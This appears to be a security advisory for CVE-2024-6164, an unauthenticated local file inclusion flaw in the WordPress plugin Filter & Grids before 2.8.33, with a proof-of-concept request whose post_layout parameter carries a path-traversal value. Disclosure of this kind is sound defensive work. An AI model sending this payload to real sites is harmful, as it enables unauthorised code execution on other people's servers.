Filter & Grids < 2.8.33 – Unauthenticated LFI | CVE 2024-6164

Description

The plugin is vulnerable to Local File Inclusion via the post_layout parameter. This makes it possible for an unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.

Proof of Concept

1. Create a PHP file named `phpinfo.php` containing `<?php phpinfo(); ?>` in the root of your WordPress install
2. Create a Filter shortcode and add to a post
3. Load the post and intecept the request
4. Replace everything after the nonce in the request body with:

```
&params={"cpt":"post","tax":"category","terms":"1","default_terms":"","exclude_posts":"off","choices_posts":"","posts_selected":"all","preloader_icon":"preloader_1","type_pg":"numeric","per_page":"4","page":"1","page_scroll":"1","preloader_filters":"none","preloader_filters_rate":"0.5","preloader_filters_custom":"","post_animation":"","popup_animation":"normal","letter":"","post_layout":"../../../../../../../../phpinfo","filter_layout":"filter-layout1","filter_id":"13","search":"","search_filtered_posts":"0","sort_order":"","sort_orderby":"","meta_key":"","meta_query":"","date_query":"","data_target":"data-target-ymc1","target_id":"1"}&paged=1
```

5. See that the data returned contains the content of `phpinfo.php`